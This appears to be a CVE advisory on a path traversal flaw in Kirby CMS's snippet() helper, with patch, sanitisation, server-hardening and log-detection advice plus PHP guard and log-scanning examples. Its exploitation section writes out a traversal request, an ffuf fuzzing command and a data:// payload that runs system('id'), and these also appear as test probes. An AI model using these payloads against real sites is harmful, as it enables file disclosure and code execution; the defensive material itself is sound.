How the CVE Works
The vulnerability is in Kirby's `snippet()` helper and `$kirby->snippet()` method when the snippet name is built from user input. Kirby resolves a snippet name to a PHP file below the `site/snippets` directory (`<snippets root>/<name>.php`) and includes it; before the fix, path traversal sequences (`../`) in the name were not rejected, so the resolved path could escape that directory. If the snippet name is constructed from unsanitized input (e.g., `snippet($_GET['name'])`), an attacker can traverse directories to load files from unintended locations: sensitive files (the page uses `/etc/passwd` as the canonical probe) or, more dangerously, PHP code outside the snippets root, such as a file the attacker was able to upload. Kirby 3.9.8.3, 3.10.1.2 and 4.7.1 patch this by validating the resolved path against the snippets root.
DailyCVE Form
Platform: Kirby CMS
Version: <3.9.8.3, <3.10.1.2, <4.7.1
Vulnerability: Path Traversal
Severity: Critical
Date: 2024-04-10
What Undercode Say:
Exploitation:
1. Payload Example:
GET /page?name=../../../../etc/passwd HTTP/1.1
If the backend uses:
<?php snippet($_GET['name']); ?>
the helper resolves the name relative to `site/snippets` and, on unpatched versions, follows the `../` sequences out of it. Note that `snippet()` includes the resolved file as PHP and appends `.php` to the name, so a non-PHP target such as `/etc/passwd` mainly serves as a traversal probe; the practical targets are existing PHP files outside the snippets root (e.g., `site/config/config.php`, which often holds credentials) or PHP files whose contents the attacker controls.
2. Fuzzing for Vulnerable Endpoints:
ffuf -w traversal.txt -u "http://target/page?name=FUZZ" -fs <baseline-size>
Where `traversal.txt` contains payloads like `../../../config.php` plus URL-encoded variants (`%2e%2e%2f`, `..%2f`, double-encoded `%252e%252e%252f`). Filter the baseline response with `-fs` (size) or `-mc` (status) so that hits stand out.
3. PHP Execution:
If the `data://` wrapper is allowed (PHP's `allow_url_include` is enabled; it is off by default and deprecated since PHP 7.4) and the loader includes the path without first checking that it exists on disk:
GET /page?name=data://text/plain,<?php system('id');?> HTTP/1.1
(URL-encode the payload in a real request; the `.php` suffix Kirby appends ends up as trailing output after the executed code.)
Mitigation:
1. Update Kirby:
composer require getkirby/cms:^3.9.8.3
Use the patched release of the branch you are on: 3.9.8.3 for 3.9, 3.10.1.2 for 3.10, or 4.7.1 for Kirby 4 (`^4.7.1`).
2. Input Sanitization:
$snippet = basename($_GET['name']); // strip all directory components, so "../" cannot survive
snippet($snippet);
Note that `basename()` also breaks legitimate subfolder snippets such as `blocks/text`; an allowlist of expected snippet names is the more robust fix, with a path check against the snippets root as defence in depth.
3. Web Server Restrictions:
location ~ /snippets/ { deny all; }
This blocks direct HTTP requests to snippet files only; the vulnerable include happens server-side, so this is hardening, not a fix for the traversal itself.
4. Disable Dangerous PHP Functions:
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
(The payload above uses `system()`, so a list that omits it does not stop that example.)
5. Log Monitoring:
grep -Ei '(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)' /var/log/nginx/access.log
(A bare `grep "../"` treats the dots as regex wildcards and matches almost every line, and traversal in query strings is usually percent-encoded.)
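As an added example (not Kirby's code and not from the advisory), the vulnerable pattern from the exploitation section next to a hardened version that combines an allowlist, a strict name pattern and a resolved-path check against the snippets root. It assumes Kirby resolves a snippet name to `<snippets root>/<name>.php` before including it; the function names, the snippet names `news`, `teaser` and `blocks/text`, and the temporary snippets directory used by the CLI demo are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not Kirby's own code. Assumes Kirby resolves a snippet name
// to "<snippets root>/<name>.php" and includes it. Function names, snippet
// names ('news', 'teaser', 'blocks/text') and the demo directory are hypothetical.

/**
 * Syntactic check on the snippet name: returns the name when it is in the
 * allowlist (if one is given) or matches the strict pattern, otherwise null.
 * The pattern permits letters, digits, "-", "_" and single "/" separators for
 * subfolders, so "..", a leading "/", "\", ":" (stream wrappers such as
 * data://) and NUL bytes can never pass.
 */
function validateSnippetName(string $name, array $allowlist = []): ?string
{
    if ($allowlist !== []) {
        return in_array($name, $allowlist, true) ? $name : null;
    }
    return preg_match('~^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*$~', $name) === 1 ? $name : null;
}

/**
 * Defence in depth, mirroring the check the patched releases perform: resolve
 * the file that would be included and require it to sit below the snippets
 * root. realpath() returns false for files that do not exist, which also
 * rejects stream wrappers; NUL bytes are refused before any filesystem call.
 */
function isInsideSnippetsRoot(string $name, string $snippetsRoot): bool
{
    if (strpos($name, "\0") !== false) {
        return false;
    }
    $root = realpath($snippetsRoot);
    $file = realpath($snippetsRoot . '/' . $name . '.php');
    if ($root === false || $file === false) {
        return false;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0;
}

/** Vulnerable pattern from the advisory: request input goes straight to snippet(). */
function renderSnippetUnsafe(): void
{
    snippet($_GET['name']); // "../../../../etc/passwd" escapes site/snippets on unpatched Kirby
}

/** Hardened pattern: allowlist first, then the resolved-path check, then the include. */
function renderSnippetSafe(string $snippetsRoot): void
{
    $name = validateSnippetName((string)($_GET['name'] ?? ''), ['news', 'teaser', 'blocks/text']);
    if ($name === null || !isInsideSnippetsRoot($name, $snippetsRoot)) {
        http_response_code(400);
        return;
    }
    snippet($name);
}

// Stand-alone demo (CLI only): create a temporary snippets directory and run
// constructed probe names through both checks, then clean up.
if (PHP_SAPI === 'cli') {
    $root = sys_get_temp_dir() . '/snippets-demo-' . getmypid();
    mkdir($root . '/blocks', 0700, true);
    file_put_contents($root . '/news.php', "<?php // news snippet\n");
    file_put_contents($root . '/blocks/text.php', "<?php // text block\n");

    $probes = [
        'news',
        'blocks/text',
        'blocks/../news',             // resolves inside the root but is not a clean name
        '../../../../etc/passwd',
        "news\0",
        'data://text/plain,<?php system(\'id\');?>',
    ];
    foreach ($probes as $probe) {
        printf(
            "%-44s syntax=%-6s path=%s\n",
            addcslashes($probe, "\0"),
            validateSnippetName($probe) === null ? 'reject' : 'ok',
            isInsideSnippetsRoot($probe, $root) ? 'ok' : 'reject'
        );
    }

    unlink($root . '/blocks/text.php');
    unlink($root . '/news.php');
    rmdir($root . '/blocks');
    rmdir($root);
}
```

Run it with `php snippet-guard.php`. The demo shows why both checks are kept: the path check alone accepts `blocks/../news` (it resolves to a file inside the root), while the name pattern rejects it; conversely the pattern alone cannot know whether a clean-looking name was symlinked out of the directory, which `realpath()` catches.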
Detection:
- Static Analysis:
Scan for dynamic `snippet()` calls:
grep -rnE --include='*.php' 'snippet\(\$' /var/www/kirby/site/
This flags `snippet($...)` and `$kirby->snippet($...)` calls whose first argument is a variable; review each one to see whether the variable can be influenced by request input.
- Patch Verification:
Check Kirby’s version:
<?php echo Kirby::version(); ?>
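To complement the grep-based log check above, here is an added detection example (not part of the advisory): a CLI script that parses nginx combined-format access-log lines, extracts the snippet-name query parameter, decodes percent-encoding repeatedly so double encoding cannot hide `../`, and flags traversal, absolute paths and stream wrappers. The log lines are constructed for the demo, and the parameter name `name` follows the advisory's example endpoint.

```php
<?php
declare(strict_types=1);

// Added example, not from the advisory. The access-log lines below are
// constructed sample data; the query parameter "name" is the one used in the
// advisory's example endpoint.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [10/Apr/2024:10:01:02 +0000] "GET /page?name=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2024:10:01:03 +0000] "GET /page?name=../../../../etc/passwd HTTP/1.1" 200 1854 "-" "curl/8.4.0"
198.51.100.7 - - [10/Apr/2024:10:02:10 +0000] "GET /page?name=%2e%2e%2f%2e%2e%2fsite%2fconfig%2fconfig HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.7 - - [10/Apr/2024:10:02:11 +0000] "GET /page?name=%252e%252e%252fsite HTTP/1.1" 404 0 "-" "python-requests/2.31"
192.0.2.9 - - [10/Apr/2024:10:03:00 +0000] "GET /page?name=data%3A%2F%2Ftext%2Fplain%2C%3C%3Fphp%20system%28%27id%27%29%3B%3F%3E HTTP/1.1" 500 0 "-" "curl/8.4.0"
192.0.2.9 - - [10/Apr/2024:10:03:05 +0000] "GET /page?name=blocks/text HTTP/1.1" 200 300 "-" "Mozilla/5.0"
LOG;

/** Decode percent-encoding repeatedly (bounded) so double encoding cannot hide "../". */
function fullyDecode(string $value, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = rawurldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return $value;
}

/** Return a reason when the decoded snippet name looks malicious, otherwise null. */
function classifySnippetName(string $decoded): ?string
{
    if (preg_match('~(^|[/\\\\])\.\.([/\\\\]|$)~', $decoded) === 1) {
        return 'path traversal';
    }
    if (preg_match('~^[a-z][a-z0-9+.-]*://~i', $decoded) === 1) {
        return 'stream wrapper';
    }
    if (strpos($decoded, "\0") !== false || $decoded === '' || $decoded[0] === '/') {
        return 'absolute path or NUL byte';
    }
    return null;
}

/**
 * Parse each combined-format line, pull the snippet parameter out of the raw
 * query string and return suspicious requests as ip/raw/decoded/reason rows.
 */
function suspiciousSnippetRequests(string $log, string $param = 'name'): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP\/[0-9.]+"/', $line, $m) !== 1) {
            continue;
        }
        [, $ip, $uri] = $m;
        $query = parse_url($uri, PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        // Take the still percent-encoded value so that decoding stays under our control.
        if (preg_match('/(?:^|&)' . preg_quote($param, '/') . '=([^&]*)/', $query, $q) !== 1) {
            continue;
        }
        $decoded = fullyDecode($q[1]);
        $reason  = classifySnippetName($decoded);
        if ($reason !== null) {
            $hits[] = ['ip' => $ip, 'raw' => $q[1], 'decoded' => $decoded, 'reason' => $reason];
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    // Prints the four malicious requests from the sample; the two legitimate
    // snippet names ("news", "blocks/text") produce no output.
    foreach (suspiciousSnippetRequests(SAMPLE_LOG) as $hit) {
        printf("%-13s %-26s %s\n", $hit['ip'], $hit['reason'], addcslashes($hit['decoded'], "\0..\37"));
    }
}
```

To run it against a real log, replace `SAMPLE_LOG` with `file_get_contents('/var/log/nginx/access.log')`; because the check works on the decoded value, it catches `%2e%2e%2f` and `%252e%252e%252f` that a literal grep for `../` misses.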
References:
- Kirby Changelog
- CVE-2024-32751
Sources:
Reported By: github.com